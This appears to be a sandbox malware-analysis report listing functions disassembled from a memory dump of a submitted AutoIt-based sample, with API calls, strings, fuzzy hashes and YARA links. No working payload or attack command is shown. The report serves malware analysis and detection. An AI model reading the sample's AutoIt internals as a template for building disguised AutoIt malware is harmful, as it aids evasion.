GlobalFree.KERNEL32(00000000), ref: 0027A5C9
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0027A5EF
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0027A60E
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0027A630
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0027A81D

Strings

static, xrefs: 0027A518, 0027A66F
DISPLAY, xrefs: 0027A680
AutoIt v3, xrefs: 0027A4D0
, xrefs: 0027A7A3

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 3d528ea5b14011880a701d51835d1e1ee2ebd364e30d0ea7c90dc6bc3b155d10
Instruction ID: 4020330ae05d4788b0f0b5bf780debf4a7ea8d66e705796771e2d40da60ecb2a
Opcode Fuzzy Hash: 3d528ea5b14011880a701d51835d1e1ee2ebd364e30d0ea7c90dc6bc3b155d10
Instruction Fuzzy Hash: 84028F71910215EFDB14DFA4ED89EAE7BB9FB49310F008158F90AAB2A1CB709D51CF61

Function 0028D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0028D2DB
GetSysColorBrush.USER32(0000000F), ref: 0028D30C
GetSysColor.USER32(0000000F), ref: 0028D318
SetBkColor.GDI32(?,000000FF), ref: 0028D332
SelectObject.GDI32(?,00000000), ref: 0028D341
InflateRect.USER32(?,000000FF,000000FF), ref: 0028D36C
GetSysColor.USER32(00000010), ref: 0028D374
CreateSolidBrush.GDI32(00000000), ref: 0028D37B
FrameRect.USER32(?,?,00000000), ref: 0028D38A
DeleteObject.GDI32(00000000), ref: 0028D391
InflateRect.USER32(?,000000FE,000000FE), ref: 0028D3DC
FillRect.USER32(?,?,00000000), ref: 0028D40E
GetWindowLongW.USER32(?,000000F0), ref: 0028D439

Part of subcall function 0028D575: GetSysColor.USER32(00000012), ref: 0028D5AE
Part of subcall function 0028D575: SetTextColor.GDI32(?,?), ref: 0028D5B2
Part of subcall function 0028D575: GetSysColorBrush.USER32(0000000F), ref: 0028D5C8
Part of subcall function 0028D575: GetSysColor.USER32(0000000F), ref: 0028D5D3
Part of subcall function 0028D575: GetSysColor.USER32(00000011), ref: 0028D5F0
Part of subcall function 0028D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0028D5FE
Part of subcall function 0028D575: SelectObject.GDI32(?,00000000), ref: 0028D60F
Part of subcall function 0028D575: SetBkColor.GDI32(?,00000000), ref: 0028D618
Part of subcall function 0028D575: SelectObject.GDI32(?,?), ref: 0028D625
Part of subcall function 0028D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0028D644
Part of subcall function 0028D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0028D65B
Part of subcall function 0028D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0028D670
Part of subcall function 0028D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0028D698

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: d97df153a3dc6b847d852ab944f7970326363ceadc277cbdd61d96c3ce4f445f
Instruction ID: 8cd0968c5cbe58e67e360a65f1789956f77e47831e394d6141ed2c6566126f35
Opcode Fuzzy Hash: d97df153a3dc6b847d852ab944f7970326363ceadc277cbdd61d96c3ce4f445f
Instruction Fuzzy Hash: 51919071409301BFCB10AF64EC08E6BBBA9FF86325F500A19F966965E0DB71D948CF52

Function 0026DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0026DBD6
GetDriveTypeW.KERNEL32(?,002BDC54,?,\\.\,002BDC00), ref: 0026DCC3
SetErrorMode.KERNEL32(00000000,002BDC54,?,\\.\,002BDC00), ref: 0026DE29

Strings

Network, xrefs: 0026DD01
SSA, xrefs: 0026DDAF
MMC, xrefs: 0026DDE7
iSCSI, xrefs: 0026DDCB
RAID, xrefs: 0026DDC4
1394, xrefs: 0026DDA8
RAMDisk, xrefs: 0026DCED
ATA, xrefs: 0026DDA1
CDROM, xrefs: 0026DCF7
SATA, xrefs: 0026DDD9
PhysicalDrive, xrefs: 0026DC67
Unknown, xrefs: 0026DCE3, 0026DD8C
SAS, xrefs: 0026DDD2
USB, xrefs: 0026DDBD
Removable, xrefs: 0026DD15
\\.\, xrefs: 0026DC2B
FileBackedVirtual, xrefs: 0026DDF5
SCSI, xrefs: 0026DD93
Fixed, xrefs: 0026DD0B
Fibre, xrefs: 0026DDB6
SSD, xrefs: 0026DD50
ATAPI, xrefs: 0026DD9A
Virtual, xrefs: 0026DDEE

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 40ff983460e6a59303b95af962ed28d9ed0a86edcd09bbf1a5cab9152a8eccbe
Instruction ID: 32c4c1dab69090c93467cdcc339c512f2a9a7cf51383c65d7d844bf38b097a90
Opcode Fuzzy Hash: 40ff983460e6a59303b95af962ed28d9ed0a86edcd09bbf1a5cab9152a8eccbe
Instruction Fuzzy Hash: B2518331B7830AABC710EF10D881C29B7A1FB96748B24491BF4479B291DBB1DDF5DA42

Function 0022CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0022CC68
__wcsnicmp.LIBCMT ref: 0022CC80
__wcsnicmp.LIBCMT ref: 0022CC98
__wcsnicmp.LIBCMT ref: 0022CCB0
__wcsnicmp.LIBCMT ref: 0022CCC8
__wcsnicmp.LIBCMT ref: 0022CCE0
__wcsnicmp.LIBCMT ref: 0022CCF8
__wcsnicmp.LIBCMT ref: 0022CD0C
__wcsnicmp.LIBCMT ref: 0022CD4D
__wcsnicmp.LIBCMT ref: 0022CD61
__wcsnicmp.LIBCMT ref: 0022CD75
__wcsnicmp.LIBCMT ref: 0022CD89

Strings

#comments-end, xrefs: 0022CD6F
Bad directive syntax error, xrefs: 00292ECB
#comments-start, xrefs: 0022CCF2, 0022CD47
#notrayicon, xrefs: 0022CC7A
#ce, xrefs: 0022CD83
Unterminated group of comments, xrefs: 00292FB4
#OnAutoItStartRegister, xrefs: 0022CCAA
Cannot parse #include, xrefs: 00292FA1
#include, xrefs: 0022CCDA
#cs, xrefs: 0022CD06, 0022CD5B
#requireadmin, xrefs: 0022CC92
#include-once, xrefs: 0022CCC2
#pragma compile, xrefs: 0022CC62

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: d0f48fb22615ed86a5836113fb555d3ca071d590ac2448f8eae5ec58902765b3
Instruction ID: f0a5d7199fd49b19f41a7cf8a710d43bb7459b4597a01353d77c494814cee57c
Opcode Fuzzy Hash: d0f48fb22615ed86a5836113fb555d3ca071d590ac2448f8eae5ec58902765b3
Instruction Fuzzy Hash: 2D815A31670226FBDB24AFA4EC82FFF3769AF15300F100025F9456A182EB60D975CA95

Function 0028C6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0028C788
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0028C83E
SendMessageW.USER32(?,00001102,00000002,?), ref: 0028C859
SendMessageW.USER32(?,000000F1,?,00000000), ref: 0028CB15

Strings

0, xrefs: 0028C89C

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 82dfe358a2282f1afb5c233d926289909d6173c75cce4a9442010c2b9dba7471
Instruction ID: 00bc045c40387a85d4b29839b25375f1661eeb852130182d3e202511a1a73dc9
Opcode Fuzzy Hash: 82dfe358a2282f1afb5c233d926289909d6173c75cce4a9442010c2b9dba7471
Instruction Fuzzy Hash: F2F11678126302AFD715AF24DC89BAABBE8FF45314F24052DF589D62E1C774C860CBA1

Function 0028638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,002BDC00), ref: 00286449

Strings

EDITPASTE, xrefs: 0028675B
TABLEFT, xrefs: 002864A7
SHOWDROPDOWN, xrefs: 00286500
TABRIGHT, xrefs: 002864BD
CURRENTTAB, xrefs: 002864DD
GETCURRENTSELECTION, xrefs: 00286603
SENDCOMMANDID, xrefs: 002867CA
UNCHECK, xrefs: 002866A1
HIDEDROPDOWN, xrefs: 00286520
FINDSTRING, xrefs: 00286596
ISCHECKED, xrefs: 00286659
SETCURRENTSELECTION, xrefs: 002865D6
GETLINECOUNT, xrefs: 002866E4
GETCURRENTCOL, xrefs: 00286724
DELSTRING, xrefs: 00286569
ISVISIBLE, xrefs: 00286455
ADDSTRING, xrefs: 00286536
SELECTSTRING, xrefs: 00286626
ISENABLED, xrefs: 0028648C
GETCURRENTLINE, xrefs: 00286704
GETLINE, xrefs: 0028678B
CHECK, xrefs: 0028668B
GETSELECTED, xrefs: 002866C1

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: BuffCharUpper
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 3964851224-45149045
Opcode ID: 951e9a7188bb87fb38c1059d783c503fb834148385d9a872cd26142e0a375b74
Instruction ID: fab886c6f0dc19a0393a37af9b02332d4858da94b45646e6ca607268492f20d8
Opcode Fuzzy Hash: 951e9a7188bb87fb38c1059d783c503fb834148385d9a872cd26142e0a375b74
Instruction Fuzzy Hash: 82C190742342468BCB04FF10C555A6EB7A5AF94744F10485AF8866B3E2DB30ED6ECF82

Function 0028D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0028D5AE
SetTextColor.GDI32(?,?), ref: 0028D5B2
GetSysColorBrush.USER32(0000000F), ref: 0028D5C8
GetSysColor.USER32(0000000F), ref: 0028D5D3
CreateSolidBrush.GDI32(?), ref: 0028D5D8
GetSysColor.USER32(00000011), ref: 0028D5F0
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0028D5FE
SelectObject.GDI32(?,00000000), ref: 0028D60F
SetBkColor.GDI32(?,00000000), ref: 0028D618
SelectObject.GDI32(?,?), ref: 0028D625
InflateRect.USER32(?,000000FF,000000FF), ref: 0028D644
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0028D65B
GetWindowLongW.USER32(00000000,000000F0), ref: 0028D670
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0028D698
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0028D6BF
InflateRect.USER32(?,000000FD,000000FD), ref: 0028D6DD
DrawFocusRect.USER32(?,?), ref: 0028D6E8
GetSysColor.USER32(00000011), ref: 0028D6F6
SetTextColor.GDI32(?,00000000), ref: 0028D6FE
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0028D712
SelectObject.GDI32(?,0028D2A5), ref: 0028D729
DeleteObject.GDI32(?), ref: 0028D734
SelectObject.GDI32(?,?), ref: 0028D73A
DeleteObject.GDI32(?), ref: 0028D73F
SetTextColor.GDI32(?,?), ref: 0028D745
SetBkColor.GDI32(?,?), ref: 0028D74F

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 7026d59b854401093417ef230be57502e2f0547c197ca213d2f88ef1113d13b1
Instruction ID: a01cd274b00acf03aedfd5528683b9f87a32d069be01f52c1e3c17f0dfc1798d
Opcode Fuzzy Hash: 7026d59b854401093417ef230be57502e2f0547c197ca213d2f88ef1113d13b1
Instruction Fuzzy Hash: 38514C75901218BFDF10AFA4EC48EAEBB79EB09320F104515F916AB2E1DB759A40CF50

Function 0028B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0028B7B0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0028B7C1
CharNextW.USER32(0000014E), ref: 0028B7F0
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0028B831
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0028B847
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0028B858
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0028B875
SetWindowTextW.USER32(?,0000014E), ref: 0028B8C7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0028B8DD
SendMessageW.USER32(?,00001002,00000000,?), ref: 0028B90E
_memset.LIBCMT ref: 0028B933
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0028B97C
_memset.LIBCMT ref: 0028B9DB
SendMessageW.USER32 ref: 0028BA05
SendMessageW.USER32(?,00001074,?,00000001), ref: 0028BA5D
SendMessageW.USER32(?,0000133D,?,?), ref: 0028BB0A
InvalidateRect.USER32(?,00000000,00000001), ref: 0028BB2C
GetMenuItemInfoW.USER32(?), ref: 0028BB76
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0028BBA3
DrawMenuBar.USER32(?), ref: 0028BBB2
SetWindowTextW.USER32(?,0000014E), ref: 0028BBDA

Strings

0, xrefs: 0028BB4F

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: f4f47972d9fa727d7a0e1bda4123bbfeb8354b78b468697e6a7e405ff5229d6f
Instruction ID: 147e8740a45ac0299adfb2168fdbe0b8360dea3a9e6bc85eb085cf229c5c0cfe
Opcode Fuzzy Hash: f4f47972d9fa727d7a0e1bda4123bbfeb8354b78b468697e6a7e405ff5229d6f
Instruction Fuzzy Hash: A3E1D279921219EBDF11AF61DC88EEE7B78FF05714F00815AF919AA2D0DB708961CF60

Function 00222EC0 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 346COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00222F7A
IsWindow.USER32(?), ref: 002922FD

Strings

H+-, xrefs: 00292184
REGEXPCLASS, xrefs: 00292149
HANDLE, xrefs: 002920E2
L+-, xrefs: 002921B2
LAST, xrefs: 002920B6
ALL, xrefs: 00292264
T+-, xrefs: 0029220E
REGEXPTITLE, xrefs: 002920F8
TITLE, xrefs: 00292292
ACTIVE, xrefs: 002920CC
CLASS, xrefs: 00292128
INSTANCE, xrefs: 0029223C
P+-, xrefs: 002921E0

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Window$Foreground
String ID: ACTIVE$ALL$CLASS$H+-$HANDLE$INSTANCE$L+-$LAST$P+-$REGEXPCLASS$REGEXPTITLE$T+-$TITLE
API String ID: 62970417-850029484
Opcode ID: d683127fa5c6d21a8d6bdd4b7022474c68961eb3950d56ece26772edf515ebe2
Instruction ID: 9242e5aca0fd07d0f44a8d396ab405d7a6f3a963b5a43f76c0b390f7948880aa
Opcode Fuzzy Hash: d683127fa5c6d21a8d6bdd4b7022474c68961eb3950d56ece26772edf515ebe2
Instruction Fuzzy Hash: A9D1B430534242FBCF04EF50D881AAABBA4BF54344F104A1AF456675A1DB70E9BECF91

Function 0028764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 0028778A
GetDesktopWindow.USER32 ref: 0028779F
GetWindowRect.USER32(00000000), ref: 002877A6
GetWindowLongW.USER32(?,000000F0), ref: 00287808
DestroyWindow.USER32(?), ref: 00287834
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0028785D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0028787B
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 002878A1
SendMessageW.USER32(?,00000421,?,?), ref: 002878B6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 002878C9
IsWindowVisible.USER32(?), ref: 002878E9
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00287904
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00287918
GetWindowRect.USER32(?,?), ref: 00287930
MonitorFromPoint.USER32(?,?,00000002), ref: 00287956
GetMonitorInfoW.USER32 ref: 00287970
CopyRect.USER32(?,?), ref: 00287987
SendMessageW.USER32(?,00000412,00000000), ref: 002879F2

Strings

tooltips_class32, xrefs: 00287856
(, xrefs: 00287965
0, xrefs: 00287735

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 213af16299da8233271f27b1887bce0ae8cd71209d5c041250cbb80c50bb04f4
Instruction ID: f3380574ec5f7f2c1bff2f4f3f22f231569a5d8495d5d95064ae16b00c776bec
Opcode Fuzzy Hash: 213af16299da8233271f27b1887bce0ae8cd71209d5c041250cbb80c50bb04f4
Instruction Fuzzy Hash: 86B1BF75629311AFDB04EF64D848B5ABBE4FF88310F10891DF59A9B291DB70E814CF92

Function 00266CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00266CFB
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00266D21
_wcscpy.LIBCMT ref: 00266D4F
_wcscmp.LIBCMT ref: 00266D5A
_wcscat.LIBCMT ref: 00266D70
_wcsstr.LIBCMT ref: 00266D7B
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00266D97
_wcscat.LIBCMT ref: 00266DE0
_wcscat.LIBCMT ref: 00266DE7
_wcsncpy.LIBCMT ref: 00266E12

Strings

04090000, xrefs: 00266DCD
\VarFileInfo\Translation, xrefs: 00266D8F
%u.%u.%u.%u, xrefs: 00266E75
StringFileInfo\, xrefs: 00266D6A
DefaultLangCodepage, xrefs: 00266DFA

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 0911d9c2d994c9c68c462319f2b7434789606aabc01da343c817c5612e9d36d2
Instruction ID: 3da7bb3cfbd66d7c5f2b919e8359948bdfbb649727cf463c00328d8d56a143bb
Opcode Fuzzy Hash: 0911d9c2d994c9c68c462319f2b7434789606aabc01da343c817c5612e9d36d2
Instruction Fuzzy Hash: 54411771A20201BBE704AB64DD87EFF777CDF41710F040026F905A2182EB75DA70CAA6

Function 0023A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0023A939
GetSystemMetrics.USER32(00000007), ref: 0023A941
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0023A96C
GetSystemMetrics.USER32(00000008), ref: 0023A974
GetSystemMetrics.USER32(00000004), ref: 0023A999
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0023A9B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0023A9C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0023A9F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0023AA0D
GetClientRect.USER32(00000000,000000FF), ref: 0023AA2B
GetStockObject.GDI32(00000011), ref: 0023AA47
SendMessageW.USER32(00000000,00000030,00000000), ref: 0023AA52

Part of subcall function 0023B63C: GetCursorPos.USER32(000000FF), ref: 0023B64F
Part of subcall function 0023B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0023B66C
Part of subcall function 0023B63C: GetAsyncKeyState.USER32(00000001), ref: 0023B691
Part of subcall function 0023B63C: GetAsyncKeyState.USER32(00000002), ref: 0023B69F

SetTimer.USER32(00000000,00000000,00000028,0023AB87), ref: 0023AA79

Strings

AutoIt v3 GUI, xrefs: 0023A9F1

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
